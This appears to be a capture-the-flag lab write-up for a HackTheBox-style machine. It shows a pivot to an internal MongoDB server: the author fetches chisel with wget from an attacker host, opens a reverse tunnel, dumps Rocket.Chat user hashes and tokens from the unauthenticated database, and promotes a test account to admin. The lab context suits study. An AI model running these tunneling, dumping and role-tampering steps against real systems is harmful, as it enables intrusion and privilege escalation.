Talkative_MongoDB

MongoDB

---

As previously discovered the following Docker hosts are responsible for operation of the Rocket.Chat instance

• 172.17.0.2 MongoDB
• 172.17.0.3 Rocket.Chat

The Docker host, 172.17.0.3, is accessible from the public whereas 172.17.0.2 is an internal host that can ONLY be accessed from the internal network.

saul@talkative:/dev/shm$ mongo
 
command 'mongo' not found, but can be installed with:
 
apt install mongodb-clients
Please ask your administrator.

mongo is a CLI tool used to interact and administer a MongoDB instance. The target system doesn’t have it installed.

In order to interact with the MongoDB instance on the Docker host, 172.17.0.2, I’d need to tunnel it

Tunneling with chisel

---

saul@talkative:/dev/shm$ wget -q http://10.10.14.9/chiselx64 ; chmod 755 /dev/shm/chiselx64

Delivery complete

┌──(kali㉿kali)-[~/archive/htb/labs/talkative]
└─$ chisel server -p 55555 --reverse
2023/06/08 22:26:01 server: Reverse tunnelling enabled
2023/06/08 22:26:01 server: Fingerprint xNgcSfZDvcujcbbLukmjbFRfY3PcyKWcyHMVBe4s/+I=
2023/06/08 22:26:01 server: Listening on http://0.0.0.0:55555

Starting a chisel server on the Kali port 55555

saul@talkative:/dev/shm$ ./chiselx64 client 10.10.14.9:55555 R:27017:172.17.0.2:27017
2023/06/08 20:28:45 client: Connecting to ws://10.10.14.9:55555
2023/06/08 20:29:02 client: Connected (Latency 107.882302ms)

Tunneling the 172.17.0.2:27017 socket to the 0.0.0.0:27017 socket on Kali via the chisel server on the Kali port 55555

Tunnel is established. I should now be able to access the MongoDB instance on the Docker host, 172.17.0.2, from Kali

Nmap

---

┌──(kali㉿kali)-[~/archive/htb/labs/talkative]
└─$ nmap -sV -p27017 localhost    
starting nmap 7.93 ( https://nmap.org ) at 2023-06-08 22:33 CEST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00013s latency).
other addresses for localhost (not scanned): ::1
 
PORT      STATE SERVICE VERSION
27017/tcp open  mongodb MongoDB 4.0.26
 
service detection performed. please report any incorrect results at https://nmap.org/submit/ .
nmap done: 1 IP address (1 host up) scanned in 9.25 seconds

As shown above, the instance is MongoDB 4.0.26 The returning data from the basic script (-sC) was way too big to place here

Mongo

---

┌──(kali㉿kali)-[~/archive/htb/labs/talkative]
└─$ docker run -it --entrypoint "/bin/bash" --name talkative mongoclient/mongoclient
Unable to find image 'mongoclient/mongoclient:latest' locally
latest: Pulling from mongoclient/mongoclient
290431e50016: Pull complete 
6d69d403d242: Pull complete 
66a5bb5b2377: Pull complete 
814c8cc3a6fa: Pull complete 
9f2c20557b72: Pull complete 
4e4768f54d55: Pull complete 
0312d8fbddab: Pull complete 
7e87bd0aff9b: Pull complete 
Digest: sha256:ca98c95de349493fab630ca3fae6e611e27e392ebc59f14d7dd73580c045927a
Status: Downloaded newer image for mongoclient/mongoclient:latest
node@2a950390e541:/opt/meteor/dist/bundle$ 

Since Kali doesn’t come with mongo installed, and I don’t want to pollute my system, I will just get it running in a Docker container.

node@2a950390e541:/opt/meteor/dist/bundle$ mongo --host 10.10.14.9  
MongoDB shell version v4.2.10-17-g872b733
connecting to: mongodb://10.10.14.9:27017/?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("4b87aeed-b3ee-446b-abd3-df5fecc7618b") }
MongoDB server version: 4.0.26
WARNING: shell and server versions do not match
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
	https://docs.mongodb.com/
Questions? Try the MongoDB Developer Community Forums
	https://community.mongodb.com
Server has startup warnings: 
2023-06-08T11:24:02.673+0000 I STORAGE  [initandlisten] 
2023-06-08T11:24:02.673+0000 I STORAGE  [initandlisten] ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
2023-06-08T11:24:02.673+0000 I STORAGE  [initandlisten] **          See http://dochub.mongodb.org/core/prodnotes-filesystem
2023-06-08T11:24:10.288+0000 I CONTROL  [initandlisten] 
2023-06-08T11:24:10.288+0000 I CONTROL  [initandlisten] ** WARNING: Access control is not enabled for the database.
2023-06-08T11:24:10.289+0000 I CONTROL  [initandlisten] **          Read and write access to data and configuration is unrestricted.
2023-06-08T11:24:10.290+0000 I CONTROL  [initandlisten] 
---
Enable MongoDB's free cloud-based monitoring service, which will then receive and display
metrics about your deployment (disk utilization, CPU, operation statistics, etc).
 
The monitoring data will be available on a MongoDB website with a unique URL accessible to you
and anyone you share the URL with. MongoDB may use this information to make product
improvements and to suggest MongoDB products and deployment options to you.
 
to enable free monitoring, run the following command: db.enableFreeMonitoring()
to permanently disable this reminder, run the following command: db.disableFreeMonitoring()
---
 
rs0:PRIMARY> 

To my surprise, I was able to access the MongoDB instance without any credential.

DB

---

rs0:PRIMARY> show dbs
admin   0.000GB
config  0.000GB
local   0.011GB
meteor  0.005GB
 
rs0:PRIMARY> use meteor
switched to db meteor

The meteor DB must be it

rs0:PRIMARY> show collections
_raix_push_app_tokens
_raix_push_notifications
instances
meteor_accounts_loginServiceConfiguration
meteor_oauth_pendingCredentials
meteor_oauth_pendingRequestTokens
migrations
rocketchat__trash
rocketchat_apps
rocketchat_apps_logs
rocketchat_apps_persistence
rocketchat_avatars
rocketchat_avatars.chunks
rocketchat_avatars.files
rocketchat_credential_tokens
rocketchat_cron_history
rocketchat_custom_emoji
rocketchat_custom_sounds
rocketchat_custom_user_status
rocketchat_export_operations
rocketchat_federation_dns_cache
rocketchat_federation_keys
rocketchat_federation_room_events
rocketchat_federation_servers
rocketchat_import
rocketchat_integration_history
rocketchat_integrations
rocketchat_invites
rocketchat_livechat_agent_activity
rocketchat_livechat_custom_field
rocketchat_livechat_department
rocketchat_livechat_department_agents
rocketchat_livechat_external_message
rocketchat_livechat_inquiry
rocketchat_livechat_office_hour
rocketchat_livechat_page_visited
rocketchat_livechat_trigger
rocketchat_livechat_visitor
rocketchat_message
rocketchat_message_read_receipt
rocketchat_oauth_apps
rocketchat_oembed_cache
rocketchat_permissions
rocketchat_reports
rocketchat_roles
rocketchat_room
rocketchat_sessions
rocketchat_settings
rocketchat_smarsh_history
rocketchat_statistics
rocketchat_subscription
rocketchat_uploads
rocketchat_user_data_files
rocketchat_webdav_accounts
system.views
ufsTokens
users
usersSessions
view_livechat_queue_status

While there are a lot of collections within the DB, I will take a look at the meteor.users collections

meteor.users

---

rs0:PRIMARY> db.users.find()
{ "_id" : "rocket.cat", "createdAt" : ISODate("2021-08-10T19:44:00.224Z"), "avatarOrigin" : "local", "name" : "Rocket.Cat", "username" : "rocket.cat", "status" : "online", "statusDefault" : "online", "utcOffset" : 0, "active" : true, "type" : "bot", "_updatedAt" : ISODate("2021-08-10T19:44:00.615Z"), "roles" : [ "bot" ] }
{ "_id" : "ZLMid6a4h5YEosPQi", "createdAt" : ISODate("2021-08-10T19:49:48.673Z"), "services" : { "password" : { "bcrypt" : "$2b$10$jzSWpBq.eJ/yn/Pdq6ilB.UO/kXHB1O2A.b2yooGebUbh69NIUu5y" }, "email" : { "verificationTokens" : [ { "token" : "dgATW2cAcF3adLfJA86ppQXrn1vt6omBarI8VrGMI6w", "address" : "saul@talkative.htb", "when" : ISODate("2021-08-10T19:49:48.738Z") } ] }, "resume" : { "loginTokens" : [ ] } }, "emails" : [ { "address" : "saul@talkative.htb", "verified" : false } ], "type" : "user", "status" : "offline", "active" : true, "_updatedAt" : ISODate("2023-06-08T11:34:46.401Z"), "roles" : [ "admin" ], "name" : "Saul Goodman", "lastLogin" : ISODate("2022-03-15T17:06:56.543Z"), "statusConnection" : "offline", "username" : "admin", "utcOffset" : 0 }
{ "_id" : "X6Ljh84sjZHxN3z5o", "createdAt" : ISODate("2023-06-08T11:30:06.186Z"), "services" : { "password" : { "bcrypt" : "$2b$10$CObqyUGKt7fz9OeKc1tl6.TgITLgdxEvLoYbUEBHOFHyVChrBrrNu", "reset" : { "token" : "XnF13lyQpr6xLq-VU0u7bUqcPITIPNrctiS7AtczaLD", "email" : "test@talkative.htb", "when" : ISODate("2023-06-08T11:33:15.222Z"), "reason" : "enroll" } }, "email" : { "verificationTokens" : [ { "token" : "yCqFIzdojYi49aa2o-gjgRy1cpuuW-NJgsCKyWsxCfy", "address" : "test@talkative.htb", "when" : ISODate("2023-06-08T11:30:06.223Z") } ] }, "resume" : { "loginTokens" : [ ] } }, "emails" : [ { "address" : "test@talkative.htb", "verified" : false } ], "type" : "user", "status" : "offline", "active" : true, "_updatedAt" : ISODate("2023-06-08T17:46:55.144Z"), "roles" : [ "user" ], "name" : "test", "lastLogin" : ISODate("2023-06-08T17:46:36.932Z"), "statusConnection" : "offline", "utcOffset" : 2, "username" : "test" }

The credentials here are for the Rocket.Chat instance. I will grab the password hash for the admin user and attempt to crack it hashcat failed to crack the password hash. I’d need to find another way

I can also see the test account that I created way back I can just change the roles attribute of the test account to admin

rs0:PRIMARY> db.users.updateOne(
...   { username: "test" },  // Filter the document based on the username
...   { $set: { roles: ["admin"] } } // Set the new value for the "roles" field
... )
{ "acknowledged" : true, "matchedCount" : 1, "modifiedCount" : 1 }
 
rs0:PRIMARY> db.users.find({ username: "test" }, { roles: 1, _id: 0 })
{ "roles" : [ "admin" ] } // confirmed!!

Now, I should be able to access the Rocket.Chat instance as the test account with admin privileges